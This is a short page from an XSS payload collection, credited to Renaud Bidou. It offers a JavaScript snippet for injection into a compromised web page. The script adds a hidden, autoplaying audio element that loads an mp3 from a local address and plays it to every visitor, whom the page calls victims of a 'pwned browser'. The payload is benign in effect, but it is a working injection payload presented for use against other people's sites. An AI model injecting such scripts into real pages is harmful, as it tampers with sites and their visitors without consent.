Play Music HTML5 Audio XSS Payload
The script below allows you to share your favorite mp3 through your target browser.
Let’s assume the XSS payload was injected into a web page that supports unrestricted HTML an mp3 audio file would then play to the visitors of the compromised web page.
if(document.getElementById('xss_audio') == null ) { var a = document.createElement('audio'); a.src = "http://127.0.0.1/music/LesRatsQuittentLeNavire.mp3" a.autoplay=true; a.id='xss_audio'; a.style.display='none'; document.body.appendChild(a); }
A simple script that uses html5 audio tag to share your favorite MP3 with the victim.
XSS Payload to share your favorite music direct from a pwned browser.
Author: Renaud Bidou
http://www.xss-payloads.com/payloads/scripts/playmusic.js.html
Injecting XSS Payloads into an image